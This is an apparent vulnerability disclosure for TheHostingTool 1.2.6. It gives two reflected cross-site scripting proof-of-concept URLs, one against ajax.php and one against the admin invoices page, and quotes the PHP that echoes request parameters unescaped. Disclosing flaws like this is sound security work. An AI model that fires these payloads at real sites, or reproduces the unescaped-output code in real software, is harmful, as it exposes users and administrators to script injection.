TheHostingTool 1.2.6: Multiple XSS

http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=<script>alert(1)</script>&status

includes/ajax.php function notice() { global $style; if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) { if($_REQUEST['status'] == "good") { $status = true; } else { $status = false; } echo $style->notice($status, $_REQUEST['message']); } return true; } includes/class_style.php public function notice($good, $message) { if($good) { //Cool! Everything's OK. $color = "green"; } else { //Oh no! It's a bad message! $color = "red"; } $notice = '<strong><em style="color: '. $color .';">'; $notice .= $message; $notice .= '</em></strong>'; return $notice; }

http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid="><script>alert(1)</script>

invoices.php: class page { public function content(){ # Displays the page global $style, $db, $main, $invoice; if(isset($_GET['iid']) and isset($_GET['pay'])){ $invoice->set_paid($_GET['iid']); echo "<span style='color:green'>Invoice #{$_GET['iid']} marked as paid. <a href='index.php?page=invoices&iid={$_GET['iid']}&unpay=true'>Undo this action</a></span>"; } elseif(isset($_GET['iid']) and isset($_GET['unpay'])){ $invoice->set_unpaid($_GET['iid']); echo "<span style='color:red'>Invoice {$_GET['iid']} marked as unpaid. <a href='index.php?page=invoices&iid={$_GET['iid']}&pay=true'>Undo this action</a></span>"; }